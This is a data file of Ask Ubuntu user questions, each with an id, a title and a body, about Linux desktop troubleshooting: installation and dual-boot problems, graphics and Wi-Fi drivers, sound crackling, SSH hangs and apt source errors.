377867	how to switch between tabs opened in gnome-terminal and also close any particular tab using shortcut key ?	i can open as many terminal tabs i want using ctrl++shift+t . but for some reason , i 'm not able to switch the tabs using ctrl+pgup and ctrl+pgdown . so what is the shortcut-key to switch in between tabs . i also want to know how to close any particular tabs using the shortcut keys . i would be happy to know the answer . thanks in advance ! !
377871	help installing ubuntu server	i 'm using an old computer to make a server , it has an intel cpu and 2gb ram . i made a bootable usb flash drive with universal usb installer , and even tried with unetbootin . i am trying to install ubuntu server 12.04.03 32-bit . when i boot from the usb flash drive , i first choose the language and then i only get 3 choices , which are : `` test memory '' , `` boot from first hard drive '' , `` rescue broken system '' . why ca n't i install it on my hard drive ? the hard drive is formatted and clean . my desktop is a compaq from maybe 2008 . it has a pentium dual core processor and had windows vista , so i doubt there is something wrong with the usb port itself because i can easily boot from the usb , but i do n't get the option of installing anything to my hard drive , i just get those 3 options that i mentioned earlier .
377872	how to pakcage application in ubuntu sdk ?	as the title , any tutorial ? i want to know how to develop applications in ubuntu .
377873	screen brightness , gui crash , sleep/hibernate resume , mouse pointer problems with lenovo ideapad y500	i thought it 'd be better to put all my current problems in a single thread . i 've searched for almost 3 days trying to fix my issues . i failed . i ca n't change the screen brightness , the bar changes , but the brightness does not . the screen can however dim when inactive for a few minutes . the gui crashes sometimes when i drag chromium to the top . i can fix it by going into ttyx and restarting lightdm , but this kills all my windows and work ! i ca n't resume from sleep/hibernate : it just shows a black screen on restart and does nothing . ( i also get a thaw error -19 when going into hibernation ) the mouse pointer speed can also not be slided , i have to run a script myself . if i go into tty and come back , the mouse is slow again . 3 is my largest concern : it 's a laptop and i sometimes have to carry it around for 3 min and then continue work. , ubuntu 13.10 - lenovo y500 - i7 ( 3rd gen , 3630qm ) gt650m sli
377879	ubuntu 13.10 catalyst installation	i am having ubuntu 13.10 in my computer which is having radeon hd 5730 / 6570m ( supported ) and graphic controller : amd/ati mobility linux kernel : 3.12 i can not make it work in anyway , i always get black screen at login , does n't matter the procedure i follow and have to purge fglrx and rollback to open source drivers . i 've tried everything in https : //help.ubuntu.com/community/binarydriverhowto/ati also no success with catalyst control center downloaded from http : //www.thefanclub.co.za/how-to/ubuntu-amd-catalyst-install when i start the download , a popup says downloaded driver file contains errors is it simply impossible to install proprietary drivers on 13.10 , or am i doing something wrong ?
377884	python install.py -i not working	i recently tried to instal subterfuge but one of the steps included entering python install.py -i in my terminal , how ever when i did this it showed me this ! [ errno 2 ] no such file or directory please help !
377885	how to absalutely fully change terminal prompt to color	its mind bogglingly supprising how hard it is to totally change terminal prompt graphic featurs ... . like ps1 or in my case color features ... . i have edited /etc/bash.bashrc and ~/.bashrc and /root/.bashrc for those who want a quick solution i recommend just editing this file ~/.bashrc so type this command and read through the file pico ~/.bashrc that file you just edited gets loaded every login . or if you type the command `` source ~/.bashrc '' or `` . ~/.bashrc '' ok so after i did all that ... . i still dont fully get color ... . read test ; $ test i type ls and get no color ... or another example lol=ls $ lol or another example , when i make an alias command alias ls= '' ls -a '' no color the problem is command is being executed by shell , and not by me.. ? how can i just change the output to color ... always ^.^ im guessing i can just copy paste that section about fancy color from .bashrc somewhere . but i swear ... . why is this so hard ... on my ipad i could just smash my face and it would work . or on microsoft i click enable color for cmd.exe ^.^ i really really really mean always , i want to go program cool stuf f but customizing my terminal is hard o.o and i program in the terminal ... .. i have too ... . because 90 % of what i program is in perl , and i grew up sshing into servers and writing perl with emacs or pico or vi . so when i code i want to code in my terminal , and i want the output in color . its something i never had the option of before . i have never owned linux until now ... .
377890	how to add a program to cairo dock	i want to add vlc and other programs to the cairo dock but i do n't know how . i have accidentally removed terminal from the dock and i want to get it back . i am using gnome desktop .
377891	how to enable global menu for a specific application ?	most of the time i find the global menu annoying but sometimes it is usefull in some programs that was maximized specifically the webapps in unity where there are no menus . so , are there anyway to disable global menu in unity but let some applications to use it ? anyways , my system is ubuntu 13.10 .
377892	why ca n't i run ubuntu or any other distro on my pc ?	i have tried installing both ubuntu 13.04 and fedora 19 , and got very stanged glitches with both . both had very weird graphical glitches , pixels of every color appearing randomly on the screen ( this seemed to be worse with fedora , so much that i could n't even get past the installer ) i did manage to get ubuntu installed , and , along with the colored pixles , the resolution was weird ( apparently set to one higher than the max of my monitor ) and i was not able to interact with anything , excluding the ability to move the mouse . specs : operating system : windows 7 home premium 64-bit , ubuntu 13.04 processor : amd fx ( tm ) -4100 quad-core processor , ~3.6ghz memory : 8gb ram graphics : amd radeon hd 6670+ if any other information about my system is needed please tell me !
377893	code highlighting is not working properly in eclipse	i have problems highlighting code in eclipse . it looks like this . does anybody know how to fix it ?
377895	how to install ubuntu over windows 7 which is installed already in a machine	i am new to this linux distribution ( ubuntu ) .many of my friends advised me to start work on ubuntu in my college days but i have'nt done but now i came to realize that y they were keep on telling it.i am entirely new to this can somebody help me guys .
377896	complining kernel question	i have complined the 3.12 kernel on my ubuntu . however at /lib/modules/3.12.0-works there is a folder called build and source and it is a symlink to /home/jon/downloads/linux-3.12 . i hav n't delete the kernel source yet from my download folder . but is n't the build and source folder symlink suppose to point at /usr/src/linux-headers-3.12.0-works ? in future how can i avoid this error ?
377898	remap / reinstall network settings after hardware change - ubuntu 12.04	yesterday i tested the limits by putting a harddrive with installed ubuntu into a different ( ibm x41 to other ibm x41 ; not too much different ) computer . the effect looks good , everything starts fine , only network `` initialisation '' waits ( it says `` waiting for network configuration ... '' while starting ) , waits another 5 seconds and then starts without a network connection . obviously there is different networking hardware installed . so what can i do now ? reinstalling ubuntu with a stick would be easy , but not my favored way . therefore my question is : how can i `` remap '' the installed hardware for networking drivers and networking settings a it is done when booting from a stick or installing ubuntu ?
377901	auto switch workspaces	i have several monitoring applications that we would like to project using a projector in the it area of our office . one of the apps is a java application ( so auto switching tabs in a browser will not work ) . is there a way to auto switch between workspaces at a timed interval ? or is there a way to switch between full screen apps on 1 workspace ?
377903	errors during ubuntu 13.10 installation	my computer is lenovo g580 , 4gb ram , i3 3110m . i am trying to install ubuntu 13.10 on my laptop along with windows . i have emptied a partition for this and tried installation using dvd . following error message appear on my start could not open efi\boot\fallback.efl : 14 error : variable root is n't set then grub appeared and i selected try or installation .then failure reading sector 0x69c00 from cd0 '' press any key . after pressing enter 4317491 kernel panic not sync vf5 unable to mount root fs on unknown block ( 0,0 ) i tried googling the problem , but could n't find any answer and i ca n't understand this . how can i fix this ?
377907	how to encrypt ssd and hdd	i have a computer with an ssd for the system and an hdd for data . i want to encrypt both of them . is the following configuration correct ? ssd size : 20 gb | hdd size : 40 gb and what is the correct device for the boot loader installation ? /dev/sda1 or /dev/mapper/sda1_crypt ?
377908	installing realtek alc662 sound drivers on ubuntu 12.10	following the answer in do i need any extra drivers for the realtek waves maxx audio on my dell xps 17 ? , i 'm trying to install audio driver for dell xps 15 ( l502x ) from realtek site . but i 'm getting the following errors : # ./install ... ..decompress driver source v1.0.2x-5.18 compile driver ... ... .. ./install : 19 : ./install : ./configure : not found make : *** no targets specified and no makefile found . stop . make : *** no rule to make target `install ' . stop . ./install : 23 : ./install : ./snddevices : not found whats wrong ?
377910	screen dimming of movie on laptop when connected by hdmi to tv	i am on ubuntu 12.10 32 bit . when i connect my acer aspire laptop to my tv using hdmi cable ( with `` mirror displays '' checked in the displays window for system settings ) , the normal ( undarkened ) picture displays on the tv but a darkened image ( as compared to the image when playing the movie without the laptop connected to the tv ) on the laptop . i have the `` dim screen to save power '' unchecked & `` turn screen when inactive for '' set to `` never '' in the brightness & lock window for system settings . what 's the reason for this ? i 've noticed that `` dim screen to save power '' sometimes becomes checked on reboot .
377911	uninstal ubuntu from bootable ubuntu pc	i have a laptop with preinstalled ubuntu . but i want to remove the ubuntu and install a server in my laptop . someone says the steps to format and install the windows server or xp .
377913	how can i get my nic card to work in 10.10 throght the terminal ?	i am running ubuntu 10.10 and i can not update it until i have my wireless working . mostly because my ethernet is not strong enough to get the update packages .
377914	rhythmbox 2.97 does not show the contents of my sony walkman	after connecting , i do see the device in rhythmbox , and i can also copy files to it , but when i click on it , rhythmbox will always show 0 titles , 0 artists . any hints ? thanks !
377918	way to open applications without using dash ( w/out knowing name ) ?	in gnome2 there was a listing of applications installed . since gnome3 and unity , you have to search for the application you want . you can use run command but you have to know the name of the app you want to open . are there any other ways to open applications besides dash-applications-lens and run command ?
377925	the system is running in low graphics mode error on dell inspiron.1525	how to fix “the system is running in low graphics mode” error on dell inspiron.1525 ?
377930	why do i keep getting an error when i try to resize ext4 under extended ?	i had already assigned unallocated space to my extended partition and now i want to enlarge my ext4 partition . the problem is , it starts and when its almost finished , it gives me an error and makes me save a data file . i tried looking for a solution on this and the gparted forums , bugzilla and ubuntu forums but could n't find any . please tell me how i can extend my ext4 file . the unallocated spaces is 2gb to the left of the partition in the the extended partition . saved details information image of error since i dont have any credits
377937	how to set a custom resolution ?	i tried to use xrandr to set 1680x1050 as a new mode to vga output , but it says : sudo xrandr -- addmode vga-0 1680 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 35 current serial number in output stream : 36
377938	is a shortcut and symbolic link the same ? if not , how do i create a shortcut ?	i found this link on wikipedia : http : //en.wikipedia.org/wiki/symbolic_link according to them symlinks are not really shortcuts . i had the need to create a shortcut to a program on the desktop and i wanted to do this using a terminal command . i could not find one . rather i bumped into the ln command which does pretty much the same ( to my knowledge ) . so if it 's not the same , how do i create a shortcut ? thanks !
377941	constant crackling/popping sound on ubuntu 13.10	i just installed 13.10 and got a problem with crackling/popping sound . it 's like little crackling sound which appears every ~5-15 seconds even if i am not listening to audio . even if i just booted ubuntu , it 's still happens . if i mute system volume , it disappears , but if i just lower volume completely without muting , it 's still same as if it was on maximum volume . now i tried many solutions , like : echo 0 | sudo tee /sys/module/snd_hda_intel/parameters/power_save intel audio powersave fix in here adding tsched=0 to /etc/pulse/default.pa but nothing seem to work , and it 's very annoying . do you guys have an idea how to fix this ?
377942	the profile of gnome-terminal isnt correctly loaded by command line start	i try to start a gnome-terminal by command line.the command line is `` gnome-terminal -e `` sh /home/vm/tmp/tmp.sh '' -- title= '' tmp test '' -- tab-with-profile=/home/vm/.bashrc -- working-directory=/home/vm/tmp '' .but , there is an error information that java environment is n't set . if i start a gnome-terminal by /usr/share/applications/gnome-terminal.desktop , there is n't that error information . so , i think the profile of gnome-terminal is n't correctly loaded by command line start . what should i do ? the content of tmp.sh is # ! bin/bash ; cd /home/vm/tmp/kitchen ; ./menu modfied sh to bash dont resolve java environment isnt set . added or deleted -- tab-with-profile='default ' , do n't resolve java environment is n't set . if i start a gnome-terminal by /usr/share/applications/gnome-terminal.desktop , running sh or bash /home/vm/tmp/tmp.sh is normal . i want to running result by command line as same as by /usr/share/applications/gnome-terminal.desktop
377943	no way to connect to my wifi - dell m4800 - ubuntu 13.10x64bits	i ca n't achieve to connect to my wifi with a dell precision m4800 with ubuntu 13.10 64 bits . i added the recommended `` broadcom corporation bcm4352 802.11ac network adapter '' in software & upgrades , which allows me to see the wifi boxes around me . however , impossible to connect to them : the authentication always fails . my lspci : 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 04 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation ethernet connection i217-lm ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d4 ) 00:1c.2 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 3 ( rev d4 ) 00:1c.3 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 4 ( rev d4 ) 00:1c.4 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 5 ( rev d4 ) 00:1c.6 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 7 ( rev d4 ) 00:1c.7 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 8 ( rev d4 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qm87 express lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gk107glm [ quadro k1100m ] ( rev a1 ) 03:00.0 network controller : broadcom corporation bcm4352 802.11ac wireless network adapter ( rev 03 ) i would be very appreciative of any kind of assistance : )
377945	ssh connection hangs with packet loss	i am trying to connect to a server at work using ssh after having established an openvpn connection . this worked perfectly for months up till yesterday . since of today the ssh user @ server just hangs . a verbose output gives me openssh_5.9p1 debian-5ubuntu1.1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to *** [ *** ] port 22. debug1 : connection established . debug1 : identity file ~/.ssh/id_rsa type -1 debug1 : identity file ~/.ssh/id_rsa-cert type -1 debug1 : identity file ~/.ssh/id_dsa type -1 debug1 : identity file ~/.ssh/id_dsa-cert type -1 debug1 : identity file ~/.ssh/id_ecdsa type -1 debug1 : identity file ~/.ssh/id_ecdsa-cert type -1 and then nothing happens ... . nothing changed in the configuration . i actually succesfully connected just the other day . i also pinged the server to be sure he was not down . and there i noticed i get a huge packet loss ( order 70 % ) any idea what is going wrong ?
377948	( partially solved.. ) info about wireless being greyed out on lubuntu 13.04 , after an os upgrade	hello all i 'm adding this to provide some more information about this issue which lots of people seem to have seen : i 've not got a full solution yet , but i can confirm an oddball workaround which does work . problem ( as i experienced it ) : i have an ~2006 hp thinkpad ( =compaq 4200 ) with lubuntu 11.04 and it has been fine since i first installed that os . wireless worked normally always . if i chose to `` untick '' wireless on this os , it would disable , and it could then be re- '' ticked '' to e-enable the wireless . all fine . three days ago i updated to lubuntu 13.04 : initially , all was well - wireless up and working as normal . but : then , i un-ticked the wireless network option : it disabled , but then also greyed-out the option to re-tick it - which became impossible to do . nothing i could then find would re-enable it : the forums showed all sorts of ideas , and like other people i saw that rfkill now showed a hard block on the wireless . trying rfkill unblock all achieved nothing . also , the external wireless on/off button now does nothing . but ( 2 ) : important symptom : i now found that if i rebooted the machine , and again booted into the original 11.04 ( on another drive partition ) , that booted normally , but now with the wireless icon there too , unticked and also greyed out . so 11.04 was now also not able to open the wlan port . this confirms that the issue is very low level indeed : it must be something set down at bios ( or device-config ) level , well below the os , else two different operating systems could not both see the same issue ( caused in 13.04 , present in either 13.04 or 11.04 ) . this led me to try answer no.3 from my wireless has suddenly became disabled by hardware switch , bios , rfkill , fn+f8 do nothing note that this is specifically : a . power down and remove battery b . hold power switch for 30 sec ( attempts to power-up so empties internal capacitors ) c. power on , interrupt boot with bios setup access and choose restore defaults d. reboot if you do all of those , the problem clears . if you only do a. and c. , it does n't . this is a wierd low-level issue , seemingly caused at the moment 13.04 `` trod '' on the device at disable time : something improper must have been delivered to the device or its bios parameters ( i speak as an old hardware engineer.. : ) i hope this helps someone - plainly this issue is nothing to do with type of machine : has been reported on all sorts . apologies if you 've already solved this further - in which case please tell me : ) ~~~~~~~~~~~~~~~~~~~~~~~~~~~ update 15:00 16-nov-2013 but i have made more progress - a fix i think : i did the following ( after having restored the wireless with the actions above , under 11.04 which i have on one partition ) : a. rebooted into 13.04 b. wireless again greyed out c. opened console d. tried rfkill list result lists phy0 and hp-wifi both softblocked and hardblocked . e. tried sudo rfkill unblock wlan sudo rfkill unblock wifi f. rfkill list now shows both phy0 & hp-wifi soft unblocked and hard unblocked ; g. now look at wireless icon on taskbar : wireless still greyed out.. but -- - h. un-ticked 'enable networking ' to disable all ; j. re-ticked 'enable networking ' - wireless option tickbox now available again k. re-ticked 'enable wifi ' - * wireless working ! ! ! * cracked it !
377950	how to make ubuntu look for available wifi networks ?	i 'm using ubuntu 12.04 . i have a problem with my wifi , but not always . my system detects wifi networks some times and display it in the available wifi networks list and is able to connect properly . but , some times it does n't detect available wifi networks at all . can any tell me a way to make ubuntu look for available wifi networks ? here is the iwconfig info ppp0 no wireless extensions . lo no wireless extensions . wwan0 no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . result of lspci is network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 )
377951	problems with apt-get update ubuntu 12.04	this is what i get lately when i try to update . new with ubuntu and i 've messing around with almost everything lately.. no sure what i did before that , and although i does not look important and i am unable to fix it by myself . any ideas ? thanks ! w : duplicate sources.list entry ttp : //security.ubuntu.com/ubuntu/ precise-security/restricted amd64 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_restricted_binary-amd64_packages ) w : duplicate sources.list entry ttp : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_binary-amd64_packages ) w : duplicate sources.list entry ttp : //security.ubuntu.com/ubuntu/ precise-security/multiverse amd64 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_multiverse_binary-amd64_packages ) w : duplicate sources.list entry ttp : //security.ubuntu.com/ubuntu/ precise-security/universe amd64 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_universe_binary-amd64_packages ) w : duplicate sources.list entry ttp : //security.ubuntu.com/ubuntu/ precise-security/restricted i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ precise-security/main i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_binary-i386_packages ) w : duplicate sources.list entry ttp : //security.ubuntu.com/ubuntu/ precise-security/multiverse i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_multiverse_binary-i386_packages ) w : duplicate sources.list entry ttp : //security.ubuntu.com/ubuntu/ precise-security/universe i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_universe_binary-i386_packages ) w : you may want to run apt-get update to correct these problems
377956	dual windows 7/ubuntu machine no longer sees ubuntu partition after uninstalling wubi	until today i had successfully followed instructions from this site to install ubuntu 12.04 via wubi , and then move it to a new partition ( on a second hard disk ) . everything was working beautifully , which was a relief given that i am a brand new ubuntu user . however , after misreading some instructions on a related site , i uninstalled wubi via windows 7 's programs and features control panel . i knew i was in trouble when the uninstaller displayed a message about removing a boot record ; now my machine boots straight into windows 7 with no option for using ubuntu . i do know that ubuntu is still there and will become usable again once i fix up my machine 's boot options . however , after reading many similar pages on this and related sites i still have no idea how to do this . if i have learned anything , it is that this process seems incredibly complex and frankly very confusing , not to mention risky in terms of buggering things up and bricking my machine . ( i am an advanced computer user but have never really bothered with anything more than essential computer administration or maintenance . ) can someone please post some simple ( and foolproof ) instructions on how to get ubuntu booting again when i only have access to windows ? all i can tell you about my lost ubuntu partition is that it was on /sdb-something-or-other ( the second disk ) . apologies for what surely must be a duplicate post , but i struggled to find anything that answered my questions ( that i could actually understand ) about uninstalling wubi , and about fixing the mess i 've created for myself .
377958	how to disable dipm on an ssd in ubuntu / linux ?	i recently got an ocz vertex plus ssd added to my system ( 12.04.3 ) . it makes things super-fast . however , i sometimes get hang/freeze/lock-up of several minutes long where the ssd led stays on and anything wanting disk access is blocked . the system recovers fully afterwards , and there is no sign of any issue in the logs . the problem exists with kernel 3.2 . * and 3.8.* . searching the internet find many posts of similar issues in windows 7/8 related to dipm - a form or power management of ssds . disabling dipm is recommended , but i do n't find any text showing how to do that on linux . how can i do this ?
377960	awkward problems on kubuntu 13.10	i fresh installed kubuntu 13.10 , all seams work perfectly , graphics , sound , wifi . after several updates , i got some awkward problems that my experience ca n't help me figure what 's the matter . no more sound kickoff start app ( start menu ) wo n't open dolphin ( file manager ) wo n't open neither with the terminal command . i only can open chromium , and i have skype autostart . i remark that those problems happen maybe after i installed yakuake app . my only solution is to redo a new install .
377968	ubuntu 12.04 - trouble with ufi boot on macbook pro retina ( late 2013 )	i used the following tutorial to set up ubuntu 12.04 as dual boot on the macbook pro retina ( late 2013 ) : i did followed this article it sets up ubuntu as dual boot with efi boot only ( without grub ) . however , i have some issues with the boot configuration ... according to the tutorial , the boot manager ( refind ) needs a kernel on the hd of mac os x to be able to find it , so i copied the kernel files from ubuntu to macos x in /efi/ubuntu and provided the information to the boot manager as described in the tutorial . however , in my case , refind can boot the kernel but it fails to boot at the end since it can not find the folder /dev/disk/by-uuid and boots into the initramfs shell . creating the folder manually and providing a syslink with the uuid as name , linking to the correct partition ( in my case ../../sda4 ) lets me boot ubuntu . only problem is that i have to do those settings each time i reboot . as soon as ubuntu is loaded , the /etc/disk/by-uuid folder exists as well as the /etc/fstab ( which does not exist when booted into initramfs ) . but when i reboot i can only get to the initramfs shell again and have to create the folder and syslink again . so not really sure what is happening there . does anybody have idea ? it seems like the /dev/disk/ i get access to from the initramfs shell is not the one of the actual ubuntu . is this possible ?
377972	stopped receiving emails	i have suddenly stopped receiving emails . i have checked on the sapo website and there are 15 emails waiting on the server but they do not transfer to thunderbird . emails from gmail do transfer . how can i resolve this ?
377976	is it possible to install ubuntu ( or other distros ) to existing encrypted lvm by gui ?	i have a dual boot system with ubuntu on an encrypted lvm and an unencrypted ( obviously ) boot partition . i messed up the system bad and have the idea of replacing it with a another close distro , but the problem would be the same if i was using the desktop live cd . i have lvm2 and encryption packages installed to live system . using disk utility i can unlock and mount the old partition and i see it listed in the installer as dev\mapper\luks-something . can i install from the gui to the unlocked partition ? would n't i need to copy some encryption files , and mount the new install to place lvm/encryption ? so close ...
377977	dual boot windows 7 and ubuntu 12.04	sorry if the subject is already answered but i ca n't find the solution . i have a clean install of windows 7 and i installed ubuntu 12.04 as a second os . i manually did this partitioning using gparted the boot loader of windows is in /dev/sda1 and the ubuntu one is in /dev/sda3 . when i installed ubuntu and first booted , the pc just did n't boot at all , so i booted from ubuntu live cd and repaired grub . after that : when the ext4 filesystem is flagged : boot : ubuntu starts with the boot loader but works fine only if i choose ubuntu . if i choose windows then the problem comes ; no mouse present before pressing power button on , leads to the starting of windows ( chosen from the loader ) but lacking of mouse . if i boot like this and then plug the mouse ( i 've tried a wired microsoft usb mouse and a logitech wireless with receiver ) , it 's just not detected and all the updates i can do for my motherboard require clicking a mousebutton , keyboard does n't work for the final proceed command ( even for installing the drivers of the motherboard using the cd ) . with mouse present ( plugged in ) before pressing power button on , leads to the boot loader and if i choose windows i end up watching a purple screen and no response , after reading a fatal error : one or more table pointers are invalid . modification could be unsafe . press any key to continue booting . when the ntfs filesystem is flagged : boot : windows start but they boot alone without boot loader , not giving me the choice to pick the os . furthermore windows before start loading , tell me about the same ( mentioned above ) : fatal error : one or more table pointers are invalid . modification could be unsafe . press any key to continue booting after that windows start normally . so , what should i do to have a nice boot loader ( windows or grub ) working ?
377979	windows 8 uefi does not boot	i 've just bought a new laptop toshiba , on which there is windows 8 preinstalled . i 've installed ubuntu gnome 13.10 and grub2 detects correctly ubuntu and windows . but the strange problem is that when i try to boot windows 8 , it appears the following error : /endentire file path : /acpi ( a0341d0,0 ) /pci ( 2,1f ) /unknwnmessaging ( 12 ) /hd ( 2,200800,82000 , a8d996409dcfe211 , a8,59 ) /file ( \efi|microsoft\boot ) /file ( bootmgfw.efi ) /endentire error : can not load image . i 've tried to solve using boot-repair , using the auto-correction . but never has changed . here is the log generated by boot-repair : http : //paste.ubuntu.com/6426642/ . how can i fix this ?
377980	can i install ubuntu in my xperia pro ?	will my sony erricson xperia pro support ubuntu ?
377987	micro sd card reader not recognized	i just purchased a microsd reader and it is not being recognized when plugged in . i have a acer laptop and i tried the various commands : ls usb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 003 : id 083a:4505 accton technology corp. smcwusb-g 802.11bg but when i tried this : tail -f /var/log/syslog nov 16 20:42:17 karthick-aspire kernel : [ 838.442208 ] usb 1-1.2 : new high-speed usb device number 11 using ehci-pci nov 16 20:42:17 karthick-aspire kernel : [ 838.470423 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 nov 16 20:42:20 karthick-aspire kernel : [ 842.041055 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 nov 16 20:42:21 karthick-aspire kernel : [ 842.240509 ] usb 1-1.2 : new low-speed usb device number 13 using ehci-pci nov 16 20:42:21 karthick-aspire kernel : [ 842.312398 ] usb 1-1.2 : device descriptor read/64 , error -32 nov 16 20:42:21 karthick-aspire kernel : [ 842.488177 ] usb 1-1.2 : device descriptor read/64 , error -32 nov 16 20:42:21 karthick-aspire kernel : [ 842.663873 ] usb 1-1.2 : new low-speed usb device number 14 using ehci-pci nov 16 20:42:21 karthick-aspire kernel : [ 842.735624 ] usb 1-1.2 : device descriptor read/64 , error -32 nov 16 20:42:21 karthick-aspire kernel : [ 842.911502 ] usb 1-1.2 : device descriptor read/64 , error -32 nov 16 20:42:22 karthick-aspire kernel : [ 843.087243 ] usb 1-1.2 : new low-speed usb device number 15 using ehci-pci nov 16 20:42:22 karthick-aspire kernel : [ 843.494415 ] usb 1-1.2 : device not accepting address 15 , error -32 nov 16 20:42:22 karthick-aspire kernel : [ 843.566524 ] usb 1-1.2 : new low-speed usb device number 16 using ehci-pci nov 16 20:42:22 karthick-aspire kernel : [ 843.973714 ] usb 1-1.2 : device not accepting address 16 , error -32 nov 16 20:42:22 karthick-aspire kernel : [ 843.973922 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 i desperately need to read my sd card . how can i fix this ?
377997	java -jar using oracle lib	i have installed java-7-openjdk and it works well , but i need to use javafx in a project so i download `` java se '' ( all packages ) form oracle and i store them inside/usr/lib/jvm/jdk1.7.0_45 . now i want to execute ensemble.jar that is a set of examples of javafx . i try java -jar ensemble.jar but it does n't work because by default ubuntu does n't use my oracle packages . can i execute ensemble.jar using not the default java but my donwloaded packets ? ?
377999	hidden files show up in nautilus recent files	i 'm using ubuntu 13.10 and have a hidden folder . using the privacy app in the system settings i have excluded this folder from the dash this works well enough although i would prefer to be able to exclude all hidden files/folders from the dash rather than excluding based on specific folders . the problem though is that files in this hidden folder still show up in nautilus ' recent files . i do n't really want to disable that feature altogether but can i prevent it showing hidden files only ? ( i would have assumed that should be default behaviour ? )
378001	installing apps on separate hard drive	i have a system with three storage drives : ssd - boot hdd 1 - programs hdd 2 - storage how do i get ubuntu 13.10 to automatically install all apps to hdd 1 ( software not packaged with the os installation ) ? i know that apps are to be installed inside of / , but i want to install programs like the steam client , playonlinux installed programs , and software center managed programs on hdd 1 . how should i do this ? update : how do i do this in terminal as well ? i am using zorin os 7.1 variant of ubuntu 13.10 . zorin os does not have that ui based mount point editor only the run of the mill gparted
378002	flickering screen with kubuntu 13.10 on xps 13 ( ivy bridge )	i installed kubuntu 13.10 on an xps 13 early 2013 model ( l322x ) , having had to pass the 'nomodeset ' parameter to the installer . strangely , i only had to do this after i updated the windows installation to 8.1 . without nomodeset , and using the 'intel ' xorg driver , both the installer screen and the login screen of the actual os look something like old crt monitors would show images if you passed in an unsupported refresh rate . this is a really bad video of how it looks : http : //www.youtube.com/watch ? v=r4jxafltat4 . sorry for the lack of quality . now , in the installed os itself , if i boot with 'nomodeset ' and use the 'fbdev ' driver , i can get xorg to work . however , this is n't optimal of course . what 's happening ? as i said , the installer only started doing this without 'nomodeset ' after i updated the windows partition to windows 8.1 . also , if the intel driver is used with 'nomodeset ' , this error appears : [ 4.224 ] abi class : x.org video driver , version 14.1 [ 4.224 ] ( ii ) intel : driver for intel ( r ) integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , hd graphics , hd graphics 2000 , hd graphics 3000 , hd graphics 2500 , hd graphics 4000 , hd graphics p4000 , hd graphics 4600 , hd graphics 5000 , hd graphics p4600/p4700 , iris ( tm ) graphics 5100 , hd graphics 4400 , hd graphics 4200 , iris ( tm ) pro graphics 5200 [ 4.225 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 4.225 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 4.225 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 4.225 ] ( ++ ) using vt number 7 [ 4.228 ] ( ww ) falling back to old probe method for modesetting [ 4.228 ] ( ee ) open /dev/dri/card0 : no such file or directory help ? thanks
378004	how do i get the 'grid view ' in the selection window	when uploading a file the selection window that appears has only the 'list view ' characteristic . how do i make grid view the default system wide .
